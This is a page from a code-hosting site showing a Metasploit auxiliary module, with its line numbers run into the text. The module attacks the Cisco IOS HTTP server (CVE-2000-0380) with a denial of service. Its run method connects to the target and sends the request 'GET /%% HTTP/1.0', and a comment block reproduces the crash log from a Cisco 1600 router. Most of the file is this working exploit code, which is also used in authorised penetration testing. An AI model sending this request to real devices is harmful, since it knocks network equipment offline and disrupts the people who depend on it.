Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Cisco IOS HTTP GET /%% Request Denial of Service',12'Description' => %q{13This module triggers a Denial of Service condition in the Cisco IOS14HTTP server. By sending a GET request for "/%%", the device becomes15unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module16tested successfully against a Cisco 1600 Router IOS v11.2(18)P.17},18'Author' => [ 'aushack' ],19'License' => MSF_LICENSE,20'References' =>21[22[ 'BID', '1154'],23[ 'CVE', '2000-0380'],24[ 'OSVDB', '1302' ],25],26'DisclosureDate' => '2000-04-26'))2728register_options(29[30Opt::RPORT(80),31])3233end3435def run36connect3738print_status("Sending HTTP DoS packet")3940sploit = "GET /%% HTTP/1.0"41sock.put(sploit + "\r\n")4243disconnect44end45end4647=begin4849Patrick Webster 20070915 Cisco 1600 Router IOS v11.2(18)P5051IOS info:52IOS (tm) 1600 Software (C1600-Y-L), Version 11.2(18)P, RELEASE SOFTWARE (fc1)53Copyright (c) 1986-1999 by cisco Systems, Inc.54Compiled Mon 12-Apr-99 14:53 by ashah5556Example crash:5758%Software-forced reload59Preparing to dump core...60Router>61*Mar 1 00:03:06.349: %SYS-2-WATCHDOG: Process aborted on watchdog timeout, Process = HTTP Server62-Traceback= 80EE1BC 80F0EC0 80EC004 81C0832 81C0B2E 81C0C76 81C0D68 81C0E4E63Queued messages:64*** EXCEPTION ***65software forced crash66program counter = 0x80eaca667status register = 0x270068vbr at time of exception = 0x40000006970=end717273